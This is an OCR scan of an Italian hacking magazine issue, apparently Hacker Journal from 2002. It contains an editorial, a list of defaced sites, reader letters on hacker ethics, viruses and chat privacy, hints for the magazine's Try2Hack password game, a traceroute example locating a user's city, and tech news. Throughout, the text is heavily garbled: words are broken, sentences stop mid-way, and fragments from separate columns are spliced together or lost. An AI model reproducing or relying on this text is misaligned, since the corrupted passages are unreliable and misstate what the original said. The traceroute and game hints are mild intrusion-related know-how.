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Quando avrete tra le mani questo numero di 
Hacker Journal probabilmente starete per 
passare il più lungo periodo dell'anno off/ine. 
Oltre a mare, sole, cuore e amore, da qualche 
anno per molte persone Agosto significa an- 
che (o soprattuto) niente computer e niente In- 
ternet Certo, qualcuno ha un portatile e la li- 
nea telefonica anche nella casa delle vacan- 
ze, ma non son mica poi tanti. Tranquilli, do- 
po pochi giorni di crisi da astinenza, mare, so- 
le, cuore e amore avranno la meglio, e non 
sentirete più tanto la mancanza del fischio del 
modem, del rilassante scorrere del mouse sul 
tappetino e del luccichio del monitor negli oc- 
chi. Se così non fosse, siete davvero malati. 
Per i piccoli momenti di nostalgia da rete pe- 
rò, portatevi in vacanza questa copia di Hac- 
ker Journal, da gustare un po' alla volta, tra 
un bagno e una piadina. 

grand@hackerjournal.it 


Ormai sapete dove e come trovarci, appena 
possiamo rispondiamo a tu tti, anche a que lli 
incazzati. Parola di hacker. 
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"Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione 
» come espandere le loro capacità, a differenza di molti utenti, che preferiscono 
riparare solamente il minimo necessario." 


Danni in rete 

Nuove vittime! 



Esperia.it - http://basilicata.esperia.it 




I u '. fc _ 


IT Business LUeekly - ujujuj.itbussinessiueeklt.it 


B7— --.a: 


lphj*|ftftELl 


polizia.it ujebmail - uiujuj.polizia.it 



2 | www.hackerjournal.it 



OPEN SOURCE 


Poca coerenza? 


Salve HJ, 

vi scrivo a proposito del- 
la lettera da voi pubbli- 
cata sul numero 5 dal 
titolo "La sicurezza, 
una toppa alla volta". 
Credo che, nello spiri- 
to hacker, tale lettera 
' sia un isulto alla filo- 
sofia che accomuna "i 
veri hacker". Almeno si 
contrappone alla filosofia 
degli hacker definita nel 7/ j ar- 
gon file", universalmente riconosciuta 
come "bibbia degli hacker". 
Se l'autore della mail pubblicata vuo- 
le essere un hacker avrebbe dovuto 
segnalare il buco ai webmaster o agli 
amministratori del sistema, questo 
sempre secondo il jargon file. Il fatto 
di non averlo fatto e, anzi, averne ap- 
profittato inviando (secondo quello 
che scrive) 50.000 messaggi ne fa un 
cracker e della peggiore specie. Se 
tutti rispettassimo un po' più le rego- 


sizione i servivi gratuiti, come gli SMS 
via internet, forse avrebbero conti- 
nuato a farlo (anche se ne dubito... ma 
questa è un'altra storia). 
Ma non è per questo che vi scrivo, non 
li male per una 
persona trovare una falla in qualche 
sito e approfittarne, vantandonese 
con gli amici per fare il figo. Sempli- 
cemente quella persona non è un hac- 
ker. Avreste, se vi ritenete una rivista 
per hacker, dovuto sottolinearlo, IM- 
HO naturalmente. Criticare pubblica- 
mente un sistema e non parlarne di- 
rettamente con i responsabili non gio- 
va a nessuno, prima fra tutti alla co- 
munità hacker che già gode di una 
pessima reputazione nell'opinione 
pubblica. Se vi ritenete una rivista che 
vuole far conoscere al pubblico lo spi- 
rito trainante degli hacker, con questa 
email avete, sempre IMHO, fallito mi- 


seramente. Cambiando pagina, nello 
stesso numero, altra mail: "Nel pro- 
fondo blu". Viene evidenziato un pas- 
saggio: "...pensano agli hacker come 
delinquenti, che loro usano queste sfi- 
de solo perché vogliono fare qualcosa 
di diverso e per dimostrare al mondo 
intero che niente è veramente sicuro 
come si dice". In piena contrapposi- 
zione con la mail della pagina prece- 
dente. Non mi sembra che HCSIelKapo 
abbia voluto dimostrare altro che il 
fatto di aver potuto inviare a "sbafo" 
50*10^3 (cito testualmente) messaggi 
SMS, se questo non è delinquere... Al- 
tra pagina... credo che sia ottima la 
risposta data nella mail "Ah, dottore 
dottore", in vero spirito hacker... ma, 
se la pensate davvero così sul softwa- 
re come mai ci sono i link ad asta la vi- 
sta sull'aritcolo "Effetti speciali? Li 
faccio io" pagina 26 numero 3, con un 
paragrafo dal titolo "Se li volete gra- 
tuiti"? Un po' di coerenza non farebbe 
male... sempre IMHO. Forse chi scrive 
gli articoli e chi risponde alle mail la 
pensano in modo un po' troppo diver- 
samente, credo dobbiate rivedere un 
po' la vostra linea etica, IMHO. Certo, 
se diventate una rivista per "hacker" 
così come indicato nel jargon file, 
molti script kiddie, che tanto sono 
maltrattati a parole nella vostra rivi- 
sta, ma tanto rifocillati da link utili da 
dove scaricare Warez e exploit, non 
compreranno più la vostra rivista, for- 
zandovi a dover introdurre la pubbli- 
cità (tanto odiata, anche se non capi- 
sco perché? tanto non credo che Mi- 
crosoft o Symantech vorrebbero fare 
la pubblicità sulla vostra rivista...). 
Almeno però ci sarebbe un po' più di 
coerenza tra quello che vi proponete 
di fare e cosa alla fine invece fate. In 
ultima analisi, seguirei il consiglio 
datovi dalla lettrice Irene108 sempre 
sul numero 5, cambiate il nome in 
"cracker journal" credo avrete ancora 


più lettori e almeno non dovete far 
"finta" di voler promuovere lo spirito 
hacker, che a mio avviso continuate, 
non sempre ma spesso, ad infanga- 
re... se sulla pagina numero due di 
ogni numero ci sono i siti defacciati, 
come diavolo volete che la gente pen- 
si bene degli hacker???? Ma questi 
sono solo pensieri di un vecchio geek 
trentenne, capisco che la rivista non si 
rivolge a persone come me, infatti 
quando qualcuno mi chiede perché 
compro la vostra rivista gli rispondo 
"per combattere il nemico bisogna co- 
noscerlo...". 


Come abbiamo già avuto modo di dire, 
Hacker Journal ha aperto una finestra 
di carta su un mondo, quello dell'hac- 
king, che ha le sue contraddizioni e le 
sue divisioni. È abbastanza normale 
quindi che la rivista rifletta in parte 
tutto questo. Certo, una linea editoria- 
le ce l'ha, ed è quella che puoi legge- 
re nelle risposte e negli articoli. Per 
quanto riguarda le lettere, noi pubbli- 
chiamo quelle che stimolano riflessio- 
ni, come quella del numero scorso che 
ti ha tanto colpito. E pubblichiamo vo- 
lentieri la tua, sperando che faccia ri- 
flettere qualcuno, che ci scriverà la 
sua interpretazione che genererà... 
eccetera. Questa è una piazza dove si 
fanno riflessioni pubbliche, dove le 
persone possano formarsi un'opinio- 
ne, cambiare punto di vista, e magari 
passare da una parte all'altra. Forse 
qualcuno che comincia con gli exploit 
si rende conto che non è poi 'sta gran 
cosa, e gli viene voglia di diventare 
un hacker vero. Se però etichettiamo 
subito buoni e cattivi, decidendo di 
parlare solo ai primi, perdiamo tutti 
questa possibilità. 

...Ah, secondo me HCSIelKapo stava 
un po' esagerando quando parlava di 
50*10^3 SMS. 


UN GIORNALE PER TUTTI: SIETE NEUJBIE Q UERI HRCKERS? 


<s® ®$$ 


MIO HACKING 


Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac- 
king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si fa 
per dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo di 
Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co- 
mincia), MIDHACKING (per chi c'è già dentro) e HARDHACKING (per chi man- 
gia pane e worm). 
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COMPILATORI GRATIS 

Sono un appassionato (inesperto) 
di programmazione Object Ori- 
ented, e ho bisogno di un vostro 
consiglio: mi sapreste indicare un 


mi;nifc»mMtHf 


Ve ne sarei infinitamente 
enete però presente che uti- 
lizzo come SO Windows 98 e ME! 
So che dovrei passare a Linux, ma 
qui sorge un secondo problema: ho 
appena installato su una partizione 
del mio hard disk la distro 8.2 di 
Mandrake, ma non appena questa 
entra nella schermata iniziale il mio 
(piuttosto vecchio)^ monitor viene 
messo in stand-by! E possibile risol- 
vere anche questo problema? Gra- 


Continuate a mandarci le vostre immagini: questa è di FXM (Gianni 
che ha esagerato un po', mandando un Tiff da 10 Mei 
er auesto tioo di cose va benissimo, e oesa mo 


Christi@n 


Alcuni vecchi compilatori Borland 


sono ora gratuiti! Non saranno i più 
aggiornati, ma sono affidabili, do- 
cumentati e gratuiti. Li puoi trovare 
all'indirizzo: 

http://community.borland.com/mu- 
seum Per scaricarli è necessaria una 
registrazione gratuita. 
Per quanto riguarda il malfunziona- 
mento del monitor con la Mandrake, 


CREW IN CERCA DI NUOVI MEMBRI 

Salve, 

vi abbiamo già scritto per farvi i 

complimenti sul fatto che migliorate 

in ogni nuovo numero, questa volta 

per chiedervi di inserire l'indirizzo 

della Crew su HJ. 

Vi chiediamo di inserire il link perché 

stiamo cercando nuovi membri e 

nuovi collaboratori per completare 

alcune sezioni del sito. 

Il sito non è ancora on-line, ma cmq 

l'indirizzo è www.epochcrew.cjb.net 

Te-mail per chi volesse parteciapare 

alla creazione del sito è 

epoch ere w@hof ma/7, com. 


problema di configurazione di 
XFree86, che probabilmente cerca 
di impostare una risoluzione o una 
frequenza di refresh non supportate 
dal monitor. Senza poterci mettere 
le mani sopra, è è però difficile fare 
diagnosi affidabili. Mi spiace, non 
riesco ad aiutarti di più. 

SECRET ZONE PIÙ RICCA! 

^^iao sono dArKcLoWn, volevo 
• chiederevi di prendere almeno 
in considerazione questa mia pro- 


posta: perche non usate la se< 


come fonte orincioale dei 


il giornale lo 

lasciamo com'è. Scommetto che i 

lettori aumenteranno notevolmente. 

¥dArKcLoWn¥ 

Come forse avrei visto, la secret zo- 
ne del sito è sempre più ricca, e in 
effetti già pensavamo di spostare lì 
alcuni degli articoli che non trovano 
posto nella rivista. Probabilmente 
per quanto riguarda la programma- 
zione, lasceremo sul giornale le 


parti più generali e discorsive, men- 
tre metteremo sul sito gli esempi di 
codice, così si possono scaricare o 


copiare senza doverli 
(con in più il rischio di 


rasenvere 


CANOTTIERE E CELLULARI 

Salve ragazzi, vi scrivo questa e- 
mail per farvi una domanda e 


una richiesta. 


s ii pupaz: 
ertina del 


■ 




nare come trova- 


un cellulare? Vi 
allego un teschio 
in Ascii. 

septar 


lo quando non trovo la posizione 
del mio telefonino faccio così: col 
telefono di casa compongo il nume- 
ro del cellulare, e poi cerco di loca- 
lizzarlo seguendo la suoneria. Ge- 
neralmente lo trovo sotto ai cuscini 


CORAGGIO DI OSARE: INDI PENDENTI DA TU Ti 


del divano. O dentro a un calzino. 
Ma forse non era questo che voi 
vi sapere... :-D 

Più seriamente, un cellulare può 
essere localizzato molto facilmen- 
te dal gestore e dalle forze di po- 
lizia. Per un privato implica uno 
sforzo molto grande e l'utilizzo di 
apparecchi e tecniche vietate. 
Per quanto riguarda la canottiera, 
nei primi bozzetti il personaggio in 
effetti la indossava. Poi abbiamo 


deciso di lasciarlo a torso nudo, 


ma non ci siamo accorti che il gra- 
fico aveva lasciato il computer 
esposto al sole. Il giorno dopo, 
quando la rivista era già in stam- 
pa, sono comparsi i segni dell'ab- 
bronzatura. 

Non ti preoccupare: se riguardi la 
copertina verso ottobre, saranno 
probabilmente spariti. E per fortu- 
na che qualche riga sopra avevo 
scritto "scherzi a parte". 


TOLLERANZA E PASSWORD 


"Ogni individuo, per quanto ti possa 
sembrare più scemo o più intelligen- 
te di te, più buono o più cattivo, più 
giusto o più ingiusto, più onesto o 
più bugiardo, più "antico" o più mo- 
derno, più ignorante o più colto e, 
perfino, identico a te, 


osa di importante da co 
Puoi condividerla o contestarla 
ma solo dopo averla ascoltato. Altri- 


Try2Hack, fate vedere di che pasta siete fatti! 


ITRY^HACK: METTETE ALLA| 
PROVA LA VOSTRA ABILITAI 


A parole siete tutti bravi, ma riuscite ve- 
ramente a passare dei livelli di protezio- 
ne? Dimostratelo al mondo e a voi stessi 
cercando di superare i dieci livelli di dif- 
ficoltà del giochino Try2Hack (che si leg- 
ge "try to hack"), presente sul nostro sito 
www.hackerjournal.it. 
Il gioco consiste nel superare i vari livel- 
li, inserendo ogni volta le password cor- 
rette (oppure arrivando in altri modi alle 
pagine protette da password). 
Per farlo, potreste avere bisogno di alcu- 
ni programmi (Macromedia Flash, Soffi- 
ce, Visual Basic). 

Di tanto in tanto qualche lettore ci scrive 
per dire che alcuni livelli sembrano non 
funzionanare. Noi vi possiamo assicura- 
re invece che tutti quanti funzionano 
esattamente come dovrebbero. 
Chi ha orecchie per intendere... 


Nuova password!!! 

Ecco i codici per accedere alla Secret Zone 
del nostro sito, dove troverete informazioni 
imenti interessanti. Con alcuni browser, 
>trebbe capitare di dover inserire due vol- 
gli stessi codici. Non fermatevi al primo 


user: 


frast 
uoni9 



'Tfoy/Sffeafe 


l"rJ 


toy/ZttXe:* 


Vy-HLILHr . .™-r .*-.-. 


Mi«n 


Non è difficile capire il linguaggi! 
con cui è realizzata la protezione de 
livello 4: Java. Da qualche parte ne 
file temporanei dovreste quindi tro- 
vare un file che ha a che fare cor 
l'applet in questione. Buon lavoro. 


Il livello 5 funziona con un program- 
ma scritto in Visual Basic. Le tracce t 
gli indizi andranno trovati all'inter- 
no del programma, dopo averlo de- 
compilato. Cercate la sezione relati- 
va all'autenticazione e... lavorate di 
fantasia. 


Anche il livello 6 utilizza un pro- 
gramma in Visual Basic, ma non è 
possibile decompilarlo. Bisognerà 
quindi cercare di intuire qualcosa 
del suo funzionamento osservando 
tutto quello che il programma fa al- 
le nostre spalle (a quale server si 
collega e cosa si dicono i due). 


Mandateci una mail a: try2hack@hackerjournal.it 
scrivendo il numero del livello a cui siete arrivati e le pas- 
sword di tutti i livelli precedenti. Sui prossimi numeri pubbli- 
cheremo l'elenco dei migliori. 
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menti, resta in silenzio!" È un mio 
modo di pensare che stasera ho tra- 
dotto in parole per voi (la frase so- 
pra è mia, giuro!), riflettendo sui prò 
e i contro delle critiche verso Hacker 
Journal che ho letto fin dai primi nu- 
meri (ARGGGHH! mi sono perso il 
n.3 - colpa dell'uscita quindicinale). 
Forse non condivido tutto quello che 
fanno gli hackers (forse, perché de- 
vo capire ancora bene cosa vera- 
mente fanno) però mi appassiona 
l'idea di poter conoscere qualcuno 
nuovo, e ascoltare la cosa importan- 
te che ha da proporre. 
In bocca al lupo. 


^pft; 


hii cne accanano o giurn 
andò ci azzeccate? Ho oro 


magari appositamente 


per creare un po' di suspance???!!) 

E non scrivetemi che un hacker la 

password se la cerca da sola: se ero 

già un hacker non mi compravo il 

giornale per diventarlo (magari per 

provarci). 

Have a nice night 

Rafolino[RAF] 

Per quanto riguardo lo password, noi 
l'abbiamo sempre azzeccota. A non 
azzeccarla a volte sono stati i lettori, 
che spesso e volentieri confondevano 
I (elle) con 1 (uno) o (zero) con O 
(vocale o). Per tagliare la testa al to- 
ro, abbiamo deciso di non utilizzare 
più caratteri ambigui nello scegliere 
le nuove password. Precisiamo anco- 
ra una volta che, quando esce il nuo- 
vo numero della rivista, le password 
associate al vecchio numero cessano 
di funzionare. 

LA MADRE DEI LAMER È 
SEMPRE INCINTA 

Mi presento: mi chiamo Francesco 
"Squalo", ho 27 anni e vivo a 
Latina. Oggi, in una sperduta edico- 
la della mia città, ho trovato il n.3 
della vs rivista. Inizialmente ho pen- 
sato ad un nome ingannevole ma, 
sfogliandola, ho scoperto che il no- 
me era coerente con il contenuto. E 


lnb_ 

Ghent e Fimietta propongono di sostituire la testa- 
ta di Hacker Journal con questa immagine molto 
carina ma, secondo me, un po' troppo complessa 
come testata. Voi che ne pensate? 


non posso che farvi i complimenti!!! 
Premetto che non sono un hacker (o, 
almeno, vorrei averne le capacità e 
le conoscenze per esserlo... :P), ma 
ho iniziato ad interessarmi a questo 
"mondo" già da parecchi anni. Ini- 
zialmente con profondo odio verso 
la categoria per diversi attacchi e vi- 
rus ricevuti nei primi anni di connes- 


sione in rete. 


, certi attacchi devono essere 
\\ tra idioti che non hanno nie 


hanno fatto delle loro conosc 

" Ho "tifa- 
to" gli attacchi contro siti pedofili, 
contro lo strapotere (ed anti-privacy) 
della Microsoft, etc... Ora so distin- 
guere le categorie e comprendere 
che gli idioti sono ovunque. E sono 
felice che finalmente ci sia anche un 
posto per questi argomenti fra le 
tante riviste in edicola. Mi chiedevo 
se fosse possibile reperire i primi 2 
numeri che mi sono sfuggiti, perchè 
ho deciso di diventare un vostro let- 
tore abituale. 

Francesco "Squalo" 

Tieni comunque presente che attac- 
care il server di un altro è un reato, 
anche se questo è "cattivo". E per di 
più spesso non serve a niente. Se in- 
vece di attaccare frontalmente e bru- 
talmente i server Web di Microsoft la 
gente si impegnasse a dimostrarne 
teoricamente le vulnerabilità e a pro- 
pagandare le soluzioni alternative 
(software libero sopra tutte), il dan- 
no per Microsoft sarebbe molto mag- 


giore di un semplice attacco, che tra 
l'altro sanno benissimo come contra- 
stare). Per quanto riguarda gli arre- 
trati, puoi scaricarli dal sito in for- 
mato PDF. Da questo mese sono sta- 
ti spostati nella secret zone, alla 
quale si accede con la password che 
trovi sulla rivista. 

VIRUS SU MAC 

Cari amici, volevo sottoporvi que- 
sto problema: Premetto che uso 
Mac OS 9.0.4 e so che il virus di cui 
parlo non attacca questo sistema. 
r beccato 


(qualcuno o qualcosa sta 
usando il mio indirizzo di posta elet- 
tronica per spedire e-mail a perso- 
ne che non conosco e a cui non ho 
spedito niente). 

Contemporaneamente ho tre proble- 
mi sulla macchina: 
1 - non riesco più ad aprire i file jpg 
(messaggio :"non trovo un importa- 
tore grafico appropriato") adopero 


Arretrati 

e abbonamenti 


irsi o richiedere i numeri arretr 
er Journal, che ormai stanno divei 
jgetti da collezione. Stiamo cercar 
ire le strutture necessarie, ma p< 
sere necessario un po' di tempo. I 
)tete trovare i PDF di tutti i veccl 
sul sito nella Secret Zone, e già eh 
I sito, iscrivetevi alla nostra mailin 
e avvisati non appena i servizi e 
*nti e arretrati saranno disponibil 


CORAGG 


p|e|n|d|e|n|t|i| |d|a| 


Adobe Photoshop. 

2 - sono spariti tutti i preferiti dal 
Browser (MS Explorer 5 + Outlook 
Express 5.0.1 ) 

3 - quando apro il centro aiuti del 
Mac il testo è sparito , compare so- 
lo questa scritta "run in Dos mode 
$PELLoolE7# ". 

Sulla macchina ho anche Virtual PC 
2.0.1. Cosa ne pensate? 

Ragy 

Klez non attacco i Macintosh, mo è 
dannoso anche per gli utenti dello 
melo. La vero vittima del virus è pro- 
babilmente un tuo amico o cono- 
scente che usa Outlook per Windows 
e ha il tuo nome nella rubrica dei 
contatti. Klez infatti prende a caso 
indirizzi dalla rubrica della vittima e 
li usa come "mittente" delle email 
con le quali si propaga (per farlo 
non servono tecniche particolari, e 
parlare di spoofing è quanto meno 
esagerato). Gli altri problemi che ci- 
ti sono però effettivamente sospetti. 
Soprattutto quello relativo al Centro 
Aiuti. Anche se i virus Mac sono mol- 
to rari, mi procurerei un buon antivi- 
rus aggiornato e farei una bella 
scansione! 


DVD SU CD: COME? 

Dopo aver acquistato il n°4 del 
giornale, ho provato ha fare la 
conversione del DVD. Ho fatto tutte 
le operazione spiegate sul giornale 
e ho finito la conversione dopo lora 
e 44 minuti. Dopo aver aperto il fi- 
le convertito, si apre Windows Me- 


dia Player e vedo il film. 


\ spero ci 
te sul cross, num.) come 


| Può sembrare 
una domanda stupida ma mi serve 
un aiuto!!!! GRAZIE 

Shaddix86 

Se vuoi semplicemente rivederlo sul 
PC, basta che copi il file sul CD co- 
me se si trattasse di un documento 
qualsiasi. Quando vorrai rivederlo, 
basterà aprire quel file con il pro- 


essere visualizzato anche su un tele- 
'/ DVD, le cose 
si complicano un po'. I Video-CD in- 
fatti non possono contenere file co- 
dificati con Div-X, mo devono essere 
di tipo Mpeg-1, con impostazioni 
particolari. Trovi tutte le informazio- 
ni per creare Video CD con Easy CD 
Creator partendo da file Avi o Quick- 
Time sul sito www.roxio.com/en/sup- 
port / roxio _support / ecdc/ video jm- 
pression.html 


utenti degli indirizzi tipo: lineamo- 
dem56-podovo.dialup.provider.it 
Anche senza un indirizzo "eloquen- 
te" come questo, avendo l'indirizzo 
IP dell'utente è possibile effettuare 
un traceroute e vedere se i nomi dei 
router intermedi rivelano qualcosa. 
Per esempio, si può ottenere qualco- 
sa di questo tipo (abbiamo tagliato i 
tempi di risposta dal traceroute ed 


eliminato le prime e le 
per riservatezza...): 


me righe 


CHAT E PARANOIA 

\ /i chiedo un aiuto, spero di riceve- 
T re una vostra email al + presto: 
alcune sere fa stavo chattando in 
www.actionchat.com e, mentre par- 
lavo, la persona dall'altra par 



Inoltre mi ha spiegato che 
avrebbe potuto anche venire a cono- 
scenza del mio indirizzo e del nur 

E possibile tutto ciò? 
devo temere qualcosa? Come ha 
fatto a sapere il mio ip e la mia 
città? Navigo con 
un provider tipo li- 
bero o altro quindi l 
con ip dinamico, i 
cosa altro devo te- 
mere? Scusate la 
mia ignoranza e 
preoccupazione, ma 
non vorrei avere 1 
sgradite sorprese... 
In definitiva: è possi- 
bile scoprire tutte queste cose 
partecipante a una chat? 
me si fa? 

Giovanni 

Risalire al numero IP di un parteci- 
pante a una chat è in genere molto 
semplice, anche se varia in base al 
sistema di chat utilizzato (Ire, Icq, 
chat in Java sui siti Web...). Molti 
provider poi, e particolarmente quel- 
li più grandi, hanno un sistemo * 
dirizzi che rivela parecchie iniurmu- 
zioni della persona che si collega. Li- 
bero per esempio assegna ai propri 


può dedurre 


2 hostl49-10.pool217141.interbusiness.it 

3 r-mi225-vll0. opb.interbusiness.it 

4 r-mi225-mi258. opb.interbusiness.it 

5 r-rm258-mi21 3. opb.interbusiness.it 

6 r-rm21 3-fi63. opb.interbusiness.it 

7 r -fi 63 -fi 67 . opb .interbusiness Àt 

8 r-fi4 1-vll 9. opb. interbusiness.it 

9 hostl 98-238. poo/2 7 759.interbusiness.it 

10 gwl -hssiO.dodo.it 

Si può vedere che la connessione 
porte do un nodo di Milano (rigo 3, 
r-mi225-vl!0...), si sposto su Roma 
(riga 5, rm258-mi21 3...) per poi ter- 
minare dalle parti di Firenze (dalla 

, riga 7 in poi, r-fi63-fi67...) 

prima di arrivare al provider 
, a cui è collegato l'utente 
(doda.it). Si può dedurre 
quindi che l'utente è co//e- 
1 gafo a un nodo Dada di Fi- 
renze. 

Ancora più facilmente, il 
tutto può essere fatto usan- 
do un'utility grafica come 
" Visual Route (www. visual- 
route.com) o Neo Trace (www.mca- 
fee.com/myapps/neoworx), che mo- 
strano su una cartina geografica il 
percorso dello connessione. Con 
questi doti è possibile ottenere ulte- 
riori informazioni (indirizzo e numero 
di telefono), ma solo se si ha acces- 
so ai dati riservati del provider. 
Quest'ultimo è tenuto a custodire 
doti di questo tipo con molte atten- 
zioni, e li comunico solo olle forze di 
polizia dopo l'autorizzazione del 
"dice per le Indagini Preliminari, 
ousianzialmente, secondo me il tuo 
amico era un lamerone che le spara- 
vo un po' grosse. 


NEWS 
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O USA: ERGASTOLO 
PERI CRACKER 

/l primo ramo del parlamento americano ha 
approvato la legge Cyber Security Enhan- 
cement Act (CSEA), che inasprisce le pene 
per i reati di tipo informatico e permette alle 
forze di polizia di realizzare intercettazioni In- 
ternet o telefoniche senza bisogno di auto- 
rizzazioni da parte del tribunale. 
L'incredibile provvedimento era già stato 
preparato prima dell'1 1 settembre, ma fino 
al giorno degli attacchi terroristici di New 
York e Washington aveva parecchi avversa- 
ri, primi tra tutti i deputati più sensibili verso 
i temi legati alla privacy e ai diritti civili. Ora 
invece la legge è passata con una maggio- 
ranza schiacciante (385 voti a favore e solo 
3 contrari). Il CSEA permetterà ai tribunali 
persino di infliggere la pena dell'ergastolo a 
quei cracker che, con le loro azioni, mette- 
ranno in pericolo la vita di altre persone. Le 
intercettazioni potranno essere effettuate 
senza autorizzazione per motivi di urgenza 
(per esempio durante un attacco) o di estre- 
ma gravità (casi di sicurezza nazionale o ri- 
schio per l'incolumità delle persone), ma do- 
vranno essere limitate all'ottenimento delle 
coordinate della persona sorvegliata (indiriz- 
zo IP, email o numero di telefono); senza au- 
torizzazione non sarà possibile controllare il 
contenuto di telefonate e connessioni Inter- 
net. Una curiosità: tra le altre cose previste 
dalla legge, diventerà vietato pubblicizzare 
on-line qualsiasi "apprecchio eletronico di 
sorveglianza" (il divieto era finora relativo 
solo alla pubblicità stampata su carta). Pro- 
babilmente il governo americano è convinto 
che Bin Laden si procuri i propri strumenti 
on-line, pagando con carta di credito e fa- 
cendosi recapitare il tutto a casa! Se non al- 
tro sarà la fine dei noiosissimi pop-up del- 
la telecamerina X-1 1 ... m 


O APPLE TRA APPLAUSI E FISCHI 


□ 



Durante il Macworld Expo di New York, il CEO 
di Apple Steve Jobs ha fatto il tradizionale 
bagno di folla. Questa volta però, accanto alle 
acclamazioni, qualcuno degli utenti più fedeli è 
rimasto parecchio scontento da alcune delle no- 
vità. Tra le notizie positive c'è stato senz'altro 
Mac OS X 10.2 (noto come Jaguar), aggiorna- 
mento che migliora grandemente le funzionalità 
del sistema, il nuovo lettore di Mp3 iPod da 20 
Gbyte, gli iMac con schermo Lcd da 17" e una 
nuova serie di applicazioni gratuite che permet- 
teranno di centralizzare la gestione di contatti e 
appuntamenti, permettendo una facile sincroniz- 
zazione con palmari e cellulari. 
Due notizie hanno però deluso gli appassionati. 
La prima novità è che per l'acquisto di Jaguar 
non ci sarà nessuna versione "aggiornamento", 
gli attuali utenti di Mac OS X dovranno pagare 


139 euro più Iva come 
tutti gli altri. La seconda 
nota negativa è 
l'annuncio che i servizi 
iTooIs finora gratuiti 
(posta elettronica con 
indirizzo @mac.com, 
spazio per home page e 
pubblicazione di foto 
online e un disco 
virtuale da 25 Mbyte), 
da ora in poi saranno 
solo a pagamento. A 
fronte di un aumento 
delle caratteristiche del 
servizio (100 Mbyte di 
spazio per sito e disco 
invece di 25, 15 Mbyte 
invece di 5 per la posta, 
e l'inclusione nel 
pacchetto di software antivirus e di backup), 
gli utenti dovranno sborsare poco meno di 100 
dollari l'anno. Anche se non si tratta del primo 
servizio gratuito che diventa a pagamento, gli 
utenti sono particolarmente arrabbiati perché, 
quando Steve Jobs ha annunciato iTooIs per la 
prima volta, aveva parlato di "indirizzo email a 
vita", e questa affermazione era stata anche 
utilizzata come arma pubblicitaria. 
Al solito, accanto a chi sa solo lamentarsi c'è 
anche chi si organizza per superare le 
difficoltà, magari sfruttando le potenzialità di 
Internet. Lo staff del Powerbook Owners Club 
(www.poc.it) ha deciso di offrire 
gratuitamente a tutti i suoi soci un indirizzo di 
posta con suffisso @poc.it, e hosting sul sito 
del club, con caratteristiche diverse a seconda 
del tipo di socio (ordinario o sostenitore), ffl 


O METTIAMOCI UNA FIRMA 


□ 


C&A, azienda con sede a Milano, ha annunciato il lancio di 
SignStation: un software per Windows accenntra le opera- 
zioni relative alla firma digitale e crittografia per tutti i formati di 
file nel rispetto della legge italiana. SignStation gestisce firme 
multiple mantenendo traccia dei firmatari e della marcatura tem- 
porale delle firme. Questo permette di tenere una traccia certifi- 
cata delle modifiche a un file. Applicando la crittografia multipla 
è possibile cifrare un documento per condividerlo con un speci- 
fico gruppo di persone in un unico passaggio. SignStation e già 
disponibile e lo si può scaricare da Internet direttamente dal si- 
to della C&A (www.com-and.com). m 



IN MEDIA STAI VIRUS 


> anonimo bulgaro? 
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O E' POSSIBILE INFETTARE 3 MILIONI DI SERVER □ 
IN 30 SECONDI! 


f A quanto affermano degli analisti del set- 
tore nel documento "How to Own the In- 
ternet in Your Spare Time" rintracciabile in 
versione integrale all'indirizzo: www.icir. 
org/vern/papers/cdc-usenix- 
sec02/index.html. Tali studiosi affemano 
appunto che adottando nuove tecniche di 
infezione e diffusione è possibile infettare 
anche 3 milioni di server in mezzo minuto. 
Che ciò fosse realmente possibile è intuibi- 
le come, con tecniche adeguate, sia possi- 
bile diffondere dei virus a livello mondiale 
in pochissimi minuti, m 
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O MICROSOFT BLINDA WINDOWS XP 


/l nuovo aggiornamento di Windows XP 
(il famigerato Service Pack 1) conterrà 
una patch che renderà molto più difficile 
craccare il sistema operativo copiando 
alcune dll della versione venduta alle 
azienda (che non prevede l'uso del mec- 
canismo di attivazione basato su doppia 
chiave). Finora era infatti abbastanza fa- 
cile copiare le dll della versione "sprotet- 
ta" e utilizzare così la versione per uten- 
ti finali senza dover attivare la propria 
copia sui server Microsoft. Il SP1 invece 
verificherà l'integrità e il numero di ver- 



sione delle dll e, se 
trovasse qualcosa 
che non va, impedirà 
di effettuare l'aggior- 
namento (ma non di 
continuare a usare il 
prodotto craccato). Ancora non si sa per 
certo se Microsoft implementerà ulterio- 
ri meccanismi di autodifesa, come per 
esempio un controllo della chiave di atti- 
vazione, allo scopo di verificare che non 
sia tra quelle circolate abbondantemen- 
te su Internet. Ei 


O SCHERZI DA HACKER CON PC SMILE! 


□ 


/l vostro vicino di scrivania invita tutte 
le colleghe a vedere divertenti giochini 

salvaschermo insoliti e voi sotto sotto 
vi rodete d'invidia? 

1 vostri compagni di scuola vi mandano 
continuamente filmati via e-mail, ma il 
vostro modem ci impiega due giorni a 
scaricare un video da 1 Mb? 
Oppure avete un collega che se la tira 
"che il computer lo sa usare solo lui" e 
volete fargli un bello scherzetto con un 
falso virus? Problemi risolti!!! 

Dal 12 agosto troverete in edicola PC 
Smile, la nuova rivista, con un 
Cd-Rom in regalo pieno zeppo di 
filmati divertentissimi, giochi 
realizzati in Flash con cui . # 

sfidare i vostri colleghi, finti 
virus (da usare con X*_^ 

attenzione!), immagini sexy e 


vignette umoristiche da utilizzare come 
sfondo del desktop o da inviare agli 
amici. Se non avete voglia di passare 
ore in linea a scaricare tutto ciò che di 
più divertente circola in Rete, il 12 
agosto correte in edicola a comprare 
PC Smile! 

PC Smile è utilizzabile sia dagli utenti 
Macintosh, sia da quelli Windows. 

Nell'ultima pagina di Hacker Journal 
trovate un buono sconto di 1Euro 
per l'acquisto del primo numero di 
PC Smile! W 

Smtle 


MP3 SU PS2 

Su psxforum.com è 
possibile scarica- 
re un nuovo player 
di mp3 prodotto da 
Paradox per PS2. Il 
player ancora in fa- 
se beta, frutto di 
un accordo tra 
Paradox e Sony, 
sembrerebbe già 
funzionare in 
modo egregio. 
Ulteriori infor- 
mazioni sono 
rintracciabili 
nel sito web 
di Psxforum. El 

"HOW TO BECOME A 
HACKER" IN ITALIANO 

Per quanti sono interessati a diventare hac- 
ker un testo da non perdere è il documen- 
to "'How To Become A Hacker" di Eric S. Ray- 
mond tradotto in italiano da Andrea Ferrares- 
so di Programmazione.it. Il testo, tradotto or- 
mai da qualche mese è possibile rintracciarlo 
